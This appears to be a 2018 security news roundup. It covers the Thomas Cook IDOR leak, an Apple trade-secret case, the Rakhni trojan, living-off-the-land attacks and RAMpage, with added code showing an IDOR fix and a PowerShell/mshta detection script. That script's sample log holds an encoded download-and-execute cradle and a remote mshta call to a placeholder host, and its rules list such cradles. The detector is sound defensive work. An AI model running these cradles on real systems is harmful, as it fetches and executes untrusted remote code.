Travel Information Leaked at Thomas Cook Airlines

By: Kacy Zurkus

A bug finder recently discovered that Thomas Cook Airlines had a security vulnerability for years, making it possible for hackers to systematically download hundreds of thousands of passenger flight details and personal data going back as far as 2013.

The issue, rated a medium to high severity level, leaked personal and travel information but is reportedly now fixed, according to a 9 July blog post by Roy Solberg. After booking his vacation, Solberg reportedly received an email from Thomas Cook Airlines with a suspicious link to airshoppen.com.

“I never downloaded a lot of data as I don’t want anyone to question my motives, but I do like to get an idea of the scope of the data leak, so I did a few tests to see if I could see how many bookings this was affecting,” Solberg wrote. In his tests, Solberg found Ving bookings from as far back as 2013, with the most recent one from 2019.

Using only a booking number, it was possible to retrieve all names on the travel booking along with the email address of the person who registered the booking. Also included in the data were departure and arrival dates with airport and flight number information. After nearly two weeks of attempting to disclose the vulnerability, Solberg reportedly received little more than frustrating exchanges before never hearing from Thomas Cook Airlines again.

Three days after he went to the press, the vulnerability was reportedly fixed. This vulnerability, known as an Insecure Direct Object Reference (IDOR), is not only a commonly encountered problem on poorly designed web applications but also easy for an attacker to exploit. The issue raises concerns for both privacy and phishing attacks.
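The lookup pattern described above, as an added illustration that is not code from Solberg's post or from Thomas Cook's site: a booking endpoint that hands back a record to anyone holding the number, beside a hardened version that requires the reference to belong to the authenticated account, plus an unguessable link token for the e-mail-link case where no login is available. All booking numbers, names, routes and addresses are constructed, and the token store is a hypothetical in-memory stand-in.

```python
"""Added illustration of the IDOR pattern (constructed data; not code from
Solberg's post or from Thomas Cook's site). Booking numbers, names and
e-mail addresses below are made up."""
import secrets
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Booking:
    booking_no: str
    owner_email: str          # account that registered the booking
    passengers: tuple
    route: str
    departs: str
    returns: str


# Constructed booking records. Note the sequential numbers: once one is
# known, the rest are trivially guessable, which is what turns a single
# over-permissive lookup into a systematic leak.
BOOKINGS = {
    "100001": Booking("100001", "alice@example.com",
                      ("Alice Andersen", "Erik Andersen"),
                      "OSL-PMI", "2019-07-10", "2019-07-17"),
    "100002": Booking("100002", "bob@example.com",
                      ("Bob Berg",),
                      "CPH-LPA", "2018-02-03", "2018-02-10"),
}


def lookup_vulnerable(booking_no: str) -> Optional[Booking]:
    """The IDOR-prone shape: the booking number alone selects the record and
    nothing ties the request to the customer who owns it."""
    return BOOKINGS.get(booking_no)


def lookup_hardened(booking_no: str, session_email: str) -> Optional[Booking]:
    """Fix 1: authorise the object, not just locate it. The record is returned
    only if it belongs to the authenticated account. A foreign booking and a
    non-existent one produce the same answer, so the endpoint cannot be used
    to probe which numbers exist."""
    booking = BOOKINGS.get(booking_no)
    if booking is None or booking.owner_email != session_email:
        return None
    return booking


# Fix 2, for links that must work without a login (e.g. a "manage your
# booking" link in a confirmation e-mail): hand out an unguessable, revocable
# token instead of the booking number itself. Hypothetical helper kept in
# memory here; a real service would persist and expire these.
_LINK_TOKENS: dict = {}


def issue_link_token(booking_no: str) -> str:
    token = secrets.token_urlsafe(24)  # 192 bits of randomness, URL-safe
    _LINK_TOKENS[token] = booking_no
    return token


def revoke_link_token(token: str) -> None:
    _LINK_TOKENS.pop(token, None)


def lookup_by_link_token(token: str) -> Optional[Booking]:
    booking_no = _LINK_TOKENS.get(token)
    return BOOKINGS.get(booking_no) if booking_no else None
```

The hardened lookup deliberately returns the same "not found" result for a booking that exists but belongs to someone else and for one that does not exist at all; answering differently would let the endpoint be used to enumerate valid numbers even after the data itself is protected.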

“We take any breach of our customer data extremely seriously. After being alerted to this unauthorized access to our online duty free shopping website in Norway, we closed the loophole and took responsible actions in line with the law,” a Thomas Cook spokesperson wrote in an email.

“Based upon the evidence we have, and the limited volume and nature of the data that was accessed, our assessment is that this was not an incident which is required to be reported to the authorities. For the same reasons we have not contacted the customers affected.”

More: https://www.infosecurity-magazine.com/news/travel-information-leaked-at/

Former Apple employee charged with stealing company trade secrets

By: Rick Hurd

SAN JOSE — A former Apple employee has been charged in federal court with stealing trade secrets from the company, authorities said.

The charges against Xiaolang Zhang were filed Monday in the U.S. District Court of Northern California and allege that Zhang, a hardware engineer for Apple, planned to take some of the company’s secrets with him when he took a job with another company.

Federal agents arrested Zhang on Saturday, as he tried to go through security at Mineta San Jose International Airport, authorities said. He had purchased a last-second round-trip ticket to Beijing, China, with a final destination of Hangzhou, China aboard Hainan Airlines, authorities said.

“Apple takes confidentiality and the protection of our intellectual property very seriously,” Apple spokesman Tom Neumayr said in an email. “We’re working with authorities on this matter and will do everything possible to make sure this individual and other individuals involved are held accountable for their actions.”

Zhang, who now claims to be working for XMotors in Mountain View, came to Apple in December 2015 to work as a hardware engineer on a team trying to develop autonomous cars, authorities said. Apple has kept that research and development a closely guarded secret, and authorities said Zhang was granted broad access to confidential internal databases.

According to the criminal complaint, Zhang went on paternity leave in April this year after the birth of his child and informed Apple upon his return that he’d be leaving the company to return to China because his mother was ill. He also told his supervisor that he’d be going to work for XMotors, a Chinese startup company focused on electric automobiles and driverless vehicle technology.

When Zhang turned in his two company-issued iPhones and his laptop, Apple’s tech security team reviewed the history on his devices and found that his download activity increased dramatically and included information from confidential files, authorities said. Zhang generated 581 rows of user activity on April 28 alone; in the previous month, authorities said, he generated 610 rows.

Authorities said Zhang also admitted that he “air-dropped” information from his devices onto his wife’s personal laptop.

More: https://www-mercurynews-com.

The Worst Cybersecurity Breaches of 2018 So Far

By: Lily Hay Newman

Looking back at the first six months of 2018, there haven’t been as many government leaks and global ransomware attacks as there were by this time last year, but that’s pretty much where the good news ends. Corporate security isn’t getting better fast enough, critical infrastructure security hangs in the balance, and state-backed hackers from around the world are getting bolder and more sophisticated.

Here are the big digital security dramas that have played out so far this year—and it’s only half over.

Russian Grid Hacking

In 2017, security researchers sounded the alarm about Russian hackers infiltrating and probing United States power companies; there was even evidence that the actors had direct access to an American utility’s control systems. Combined with other high-profile Russian hacking from 2017, like the NotPetya ransomware attacks, the grid penetrations were a sobering revelation. It wasn’t until this year, though, that the US government began publicly acknowledging the Russian state’s involvement in these actions. Officials hinted at it for months, before the Trump Administration first publicly attributed the NotPetya malware to Russia in February and then blamed Russia in March for grid hacking. Though these attributions were already widely assumed, the White House’s public acknowledgement is a key step as both the government and private sector grapple with how to respond. And while the state-sponsored hacking field is getting scarier by the day, you can use WIRED’s grid-hacking guide to gauge when you should really freak out.

US Universities

In March, the Department of Justice indicted nine Iranian hackers over an alleged spree of attacks on more than 300 universities in the United States and abroad. The suspects are charged with infiltrating 144 US universities, 176 universities in 21 other countries, 47 private companies, and other targets like the United Nations, the US Federal Energy Regulatory Commission, and the states of Hawaii and Indiana. The DOJ says the hackers stole 31 terabytes of data, estimated to be worth $3 billion in intellectual property. The attacks used carefully crafted spearphishing emails to trick professors and other university affiliates into clicking on malicious links and entering their network login credentials. Of 100,000 accounts hackers targeted, they were able to gain credentials for about 8,000, with 3,768 of those at US institutions. The DOJ says the campaign traces back to a Tehran-based hacker clearinghouse called the Mabna Institute, which was founded around 2013. The organization allegedly managed hackers and had ties to Iran’s Islamic Revolutionary Guard Corps. Tension between Iran and the US often spills into the digital sphere, and the situation has been in a particularly delicate phase recently.

Malware Delivers Cryptor or Miner, Trojan’s Choice

By: Kacy Zurkus

A long-existing Trojan family still functioning today has spawned new malicious samples of malware, which infects its victims with either a cryptor or a miner, according to Kaspersky Lab.

Distributed through spam emails with documents attached, the samples are related to the Trojan-Ransom.Win32.Rakhni family. “After opening the email attachment, the victim is prompted to save the document and enable editing. The victim is expected to double-click on the embedded PDF file. But instead of opening a PDF the victim launches a malicious executable,” researchers wrote.

The Trojan decides which payload should be downloaded onto the victim’s PC at the moment the malicious executable is launched. “The fact that the malware can decide which payload it uses to infect the victim provides yet another example of the opportunistic tactics used by cybercriminals,” said Orkhan Mamedov, malware analyst, Kaspersky Lab.

“They will always try to benefit from their victims: either by directly extorting money (cryptor), by the unauthorized use of user resources for their own needs (miner), or by exploiting the victim in the chain of malware distribution (net-worm).”

Since the malware was first discovered in 2013, its writers have changed the way their Trojans obtain keys. Where keys were once generated locally, they are now received from the command and control (C&C) server. They have also altered the algorithms used, moving from a purely symmetric algorithm to the commonly used combined scheme of symmetric and asymmetric encryption.

Analysts have recently discovered 18 symmetric algorithms used simultaneously. The crypto-libraries are also different, as is the distribution method, which has ranged from spam to remote execution. In the recently spotted samples, criminals added a new mining capability feature.

More: https://www.infosecurity-magazine.com/news/malware-delivers-cryptor-or-miner/

For Financial Services, Encryption is Essential – But So Is Performance

By: Aamir Lakhani

The financial services industry is among those hit hardest by the heightened expectations of consumers to access information, receive help, and conduct transactions anywhere and at any time via their mobile devices. By 2025, Millennials are expected to generate 46 percent of all U.S. income, and yet over a fifth of them have never written a physical check to pay a bill. Instead, 38 percent use apps and mobile tools to make bill payments, and 71 percent consider their banking relationship to be transactional rather than relationship-driven.

In addition, more than one-quarter (27 percent) of Millennials are completely reliant on a mobile banking app. In fact, they are 1.3 times more likely than Gen-Xers and 2 times more likely than Baby Boomers to rely on a mobile banking app for regular banking activities.

For financial firms, the ability to offer such services represents a competitive advantage, with 75 percent of banks making investments to create and improve a customer-centric digital business model. Aside from benefitting consumers, greater accessibility to data on various devices and applications can also improve employee efficiency, meeting the common request for more open networks.

Personal Data at Greater Risk

This shift to online consumer banking has led to increasing data traffic volumes as more users rely on applications and endpoints to interact with their personal data. Addressing this growing volume of traffic has led many financial institutions to adopt cloud and, increasingly, multi-cloud environments, which means that personally identifiable information (PII) now regularly travels across different network domains.

While this increases the accessibility of data for consumers, thereby making financial services firms more competitive, it also means that their data spans a larger potential attack surface, making it more susceptible to cyberattacks. As these attacks become more sophisticated, leveraging artificial intelligence and automation to more effectively detect and exploit vulnerabilities, financial services firms not only need to engage in digital transformation but to also do so securely – protecting the private data of consumers.

Greater Interest in Encryption

Regulators are taking a close look at financial services firms to ensure they are implementing the security controls necessary to keep user data private. One of the core security features being required by these bodies is encryption. Encryption refers to converting plain text into secure code that can only be deciphered with a decryption key. This ensures that data in motion across the network and the web, as well as data at rest in the cloud or data center, cannot be seen by anyone without the key – even if it is stolen – adding a strong layer of security.

Encryption for financial services firms is being recommended today by several regulatory guidelines, including the Federal Financial Institutions Examination Council (FFIEC) and the new General Data Protection Regulation (GDPR).

More: https://www.csoonline.com/article/3284351/security/for-financial-services-encryption-is-essential-but-so-is-performance.html

Facebook and Google use ‘dark patterns’ around privacy settings, report says

By: BBC NEWS Technology

Facebook, Google and Microsoft push users away from privacy-friendly options on their services in an “unethical” way, according to a report by the Norwegian Consumer Council.

It studied the privacy settings of the firms and found a series of “dark patterns”, including intrusive default settings and misleading wording.

The firms gave users “an illusion of control”, its report suggested.

Both Google and Facebook said user privacy was important to them.

The report – Deceived by Design – was based on user tests which took place in April and May, when all three firms were making changes to their privacy policies to be in compliance with the EU’s General Data Protection Regulation (GDPR).

Illusion

It found examples of

  • privacy-friendly choices being hidden away
  • take-it-or-leave it choices
  • privacy-intrusive defaults with a longer process for users who want privacy-friendly options
  • some privacy settings being obscured
  • pop-ups compelling users to make certain choices, while key information is omitted or downplayed
  • no option to postpone decisions
  • threats of loss of functionality or deletion of the user account if certain settings are not chosen

For example, Facebook warns anyone who wishes to disable facial recognition that doing so means that the firm “won’t be able to use this technology if a stranger uses your photo to impersonate you”.

The report concluded that users are often given the illusion of control through their privacy settings, when they are not getting it.

“Facebook gives the user an impression of control over use of third party data to show ads, while it turns out that the control is much more limited than it initially appears,” the report said.

More: https://www-bbc-co-uk.cdn.ampproject.org/c/s/www.bbc.co.uk/news/amp/technology-44642569

Google reportedly allowed outside app developers to read user emails despite privacy promises

By: Elizabeth Chuck

The tech giant has allowed hundreds of outside software developers to access the inboxes of Gmail users, the Wall Street Journal reported on Monday.

Google — which a year ago vowed to clamp down on Gmail users’ privacy — has reportedly been letting outside app developers scan millions of inboxes, according to a Wall Street Journal examination.

Despite the promise from Google last June to stop scanning Gmail messages for the purpose of selling targeted ads, the tech giant has been allowing hundreds of outside software developers to access inboxes, the Wall Street Journal reported on Monday.

The app developers were reportedly granted access to the inboxes of users who signed up for email-based tools, such as price comparisons or travel-itinerary planners, the Journal said. By opting in to those tools, users were potentially exposing entire Gmail messages, email addresses, and other pieces of information to third parties, it added.

Over 90 percent of endpoint security incidents involve legitimate binaries

By: Brian Jackson

Cybercriminals use a variety of tactics to cloak their activity and that includes using trusted tools, like PowerShell, to retrieve and execute malicious code from remote sources.

A new report from eSentire reveals that 91 percent of endpoint incidents detected in Q1 2018 involved known, legitimate binaries.

“eSentire Threat Intelligence data shows heavy use of legitimate Microsoft binaries, such as PowerShell and mshta.exe, popular tools for downloading and executing malicious code in the initial stages of a malware infection,” says Eldon Sprickerhoff, founder and chief security strategist, eSentire. “PowerShell can also be leveraged by adversaries to reduce their on-disk footprint and evade detective controls by operating in memory and obfuscating command-line parameters.”
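The two behaviours Sprickerhoff describes, trusted binaries fetching remote content and obfuscated command-line parameters, are what endpoint telemetry has to be searched for. The following is an added example, not eSentire's tooling: a small triage routine run over process-creation records that decodes PowerShell's base64 `-EncodedCommand` argument before matching, weights weak signals (such as `-NoProfile`, common in legitimate admin scripts) below strong ones (a download cradle, mshta launched against a URL), and alerts only above a threshold. The log format, every line in `SAMPLE_LOG`, the host names and the `placeholder.invalid` URL are all constructed for this example.

```python
"""Added example (not eSentire's tooling): triage of process-creation
records for the living-off-the-land patterns quoted above. The log
format and every line in SAMPLE_LOG are constructed for this example;
the host names and URL are placeholders."""
import base64
import re

# Constructed encoded argument so the "obfuscated parameters" case can be
# tested end to end. PowerShell's -EncodedCommand takes base64 of UTF-16LE.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/x')"
    .encode("utf-16le")
).decode("ascii")

# Constructed process-creation records (invented key=value format).
SAMPLE_LOG = [
    r'ts=2018-03-02T10:15:04Z host=ws12 user=jdoe image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell.exe -NoProfile -File C:\scripts\backup.ps1"',
    r'ts=2018-03-02T10:16:30Z host=ws12 user=jdoe image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell.exe -nop -w hidden -enc ' + _ENCODED + '"',
    r'ts=2018-03-02T10:17:01Z host=ws07 user=asmith image=C:\Windows\System32\mshta.exe cmdline="mshta.exe http://placeholder.invalid/p.hta"',
    r'ts=2018-03-02T10:18:22Z host=ws07 user=asmith image=C:\Windows\System32\notepad.exe cmdline="notepad.exe notes.txt"',
]

LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe"}

# -EncodedCommand is accepted under any unambiguous prefix (-e, -ec, -enc, ...).
ENC_ARG = re.compile(
    r"[-/](?:e|ec|en|enc|enco|encod|encode|encoded|encodedc\w*)\s+([A-Za-z0-9+/=]{8,})", re.I)

# (name, pattern, weight): signals that also show up in routine admin use
# weigh 1; signals that rarely appear in legitimate use weigh more.
RULES = [
    ("noprofile_or_noninteractive",
     re.compile(r"-nop\b|-noprofile\b|-noni\b|-noninteractive\b", re.I), 1),
    ("hidden_window", re.compile(r"-w\w*\s+hidden\b", re.I), 2),
    ("execution_policy_bypass", re.compile(r"-e\w*\s+bypass\b", re.I), 2),
    ("encoded_command", ENC_ARG, 2),
    ("download_cradle",
     re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
                r"net\.webclient|invoke-expression|\biex\b", re.I), 3),
    ("mshta_remote_content",
     re.compile(r"mshta(?:\.exe)?\s+(?:https?:|javascript:|vbscript:)", re.I), 3),
]
ALERT_THRESHOLD = 3

_LINE = re.compile(r'host=(\S+)\s+user=(\S+)\s+image=(\S+)\s+cmdline="(.*)"$')


def decode_encoded_command(cmdline: str):
    """Plaintext behind -EncodedCommand, or None if absent or not valid base64."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def triage_line(line: str):
    """Scores one record; None for unparseable lines or uninteresting binaries."""
    m = _LINE.search(line)
    if not m:
        return None
    host, user, image, cmdline = m.groups()
    if image.rsplit("\\", 1)[-1].lower() not in LOLBINS:
        return None
    decoded = decode_encoded_command(cmdline)
    # Match against the raw command line and, when present, the decoded one,
    # so encoding does not hide the cradle from the rules.
    texts = [cmdline] + ([decoded] if decoded else [])
    hits, score = [], 0
    for name, rx, weight in RULES:
        if any(rx.search(t) for t in texts):
            hits.append(name)
            score += weight
    return {"host": host, "user": user, "image": image, "indicators": hits,
            "decoded": decoded, "score": score, "alert": score >= ALERT_THRESHOLD}


def triage(lines):
    """Only the records that cross the alert threshold, in log order."""
    results = (triage_line(line) for line in lines)
    return [r for r in results if r is not None and r["alert"]]


if __name__ == "__main__":
    for r in triage(SAMPLE_LOG):
        print(r["host"], r["user"], r["score"], r["indicators"], r["decoded"])
```

Decoding before matching is the point: a rule set that only inspects the raw command line sees nothing but base64 in the second record, whereas the decoded text exposes the download-and-execute pattern. The weights are illustrative; in practice they would be tuned against the organisation's own baseline of legitimate PowerShell use.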

The report also shows a dramatic increase in attacks targeting popular consumer-grade routers, like Netgear and Linksys (which between them hold over three-quarters of the market): researchers saw a 539 percent increase from Q4 2017 to Q1 2018. Increased targeting of routers was first observed in late 2017 when the Reaper Botnet gained media attention. Additionally, intrusion attempts across industries grew 36 percent, mostly due to DNS manipulation in consumer-grade routers. These attacks allow attackers to redirect victims to malicious infrastructure to achieve a variety of results, including malware and phishing landing pages.

“The increase in attacks against consumer network devices can be attributed to the perceived value in recruiting devices for attacks against businesses, as opposed to leveraging them as potential network entry-points,” says Sprickerhoff.

Other findings are that phishing rose 39 percent across industries, with DocuSign, Office 365, and OneDrive being the most popular lures. Office 365 showed the highest success rate and popularity for attacks, growing fivefold over 2017.

More: https://betanews-com.cdn.ampproject.org/c/s/betanews.com/2018/06/29/security-legitimate-binaries/amp/

The biggest cybersecurity risk to US businesses is employee negligence, study says

By: Carmen Reinicke

Hackers are no match for human error.

Employee negligence is the main cause of data breaches, according to a state of the industry report by Shred-it, an information security company. The report found that 47 percent of business leaders said human error such as accidental loss of a device or document by an employee had caused a data breach at their organization.

Over 1,000 small business owners and C-suite executives in the United States were surveyed online in April for the report.

In 2017, data breaches cost companies an average of $3.6 million globally, according to a separate report from the Ponemon Institute.

For smaller businesses especially, that price tag could wipe out the entire firm. For a company of any size, a data breach can also cheapen a company’s brand and negatively impact their ability to do work, according to Shred-it.

Basic bad habits

Many of the most dangerous offenses by employees are things that they might not even think about as risky behavior. A surprising number of workers surveyed by Shred-it admitted to bad security behavior at work; over 25 percent said that they leave their computer unlocked and unattended.

Even taking notes on paper, or leaving papers out on your desk, can have unintended consequences.

“When you use paper to document notes or meeting minutes it raises the risk of you leaving that information behind,” said Kalsi. A simple mistake can backfire; earlier this year, a Department of Homeland Security employee left sensitive Super Bowl security documents on a plane.

Remote work

Working from Starbucks or even your living room may be nice and convenient, but it could also be opening your company up to a dangerous data breach.

Remote work is increasing. Over half of hiring managers agree that remote work is more common and a third think it is the future of work, according to a report on the future of work from Upwork, a freelancing platform.

Cybersecurity practices have not yet caught up. A majority of executives agree that the risk of a data breach is higher when an employee works remotely, yet few businesses have comprehensive off-site policies in place for those workers. Over half of small business owners said they have no policy for remote workers.

In addition, contractors or external vendors also open up companies to data breaches. The Shred-it survey found that 1 in 4 executives and 1 in 5 small business owners said that an external vendor was the cause of a data breach at their company.

This is because many businesses don’t do a thorough job of managing access when a relationship with an external vendor ends, according to Kalsi.

“There needs to be better governance around these things,” he said.

More: https://www-cnbc-com.cdn.ampproject.org/c/s/www.cnbc.com/amp/2018/06/21/the-biggest-cybersecurity-risk-to-us-businesses-is-employee-negligence-study-says.html

RAMpage attack could give hackers access to personal information stored in your Android phone

By: Alan Friedman

An attack on Android phones that can change what is stored in the Random Access Memory (RAM) inside a handset can ultimately let a hacker gain control of the device. This attack, called RAMpage for obvious reasons, can theoretically grab passwords stored in a password manager, emails, photos, and documents stored on the unit. It is the subject of a research paper released today from three universities in India, Amsterdam and UC Santa Barbara.

RAMpage is an attack based on the Rowhammer bug, which takes advantage of the tightly packed circuitry inside a RAM chip. By electrically attacking one part of a RAM chip, memory cells leak and interfere with other memory cells. Keep in mind that this is not necessarily a flaw but a “side effect” of RAM. While some leakage between rows of memory cells is normal, and the RAM chip is able to recover, a hacker who attacks the same row repeatedly can flip the bits inside the cells, which use a binary system. The flip, from “0” to “1” or from “1” to “0”, alters the data stored in RAM.

RAMpage can be unleashed on Android devices using LPDDR2, LPDDR3 and LPDDR4 RAM. That means that any Android phone produced in 2012 or later is vulnerable. This is obviously a complicated attack, and while Android devices are the current target, eventually iOS devices could be in the crosshairs.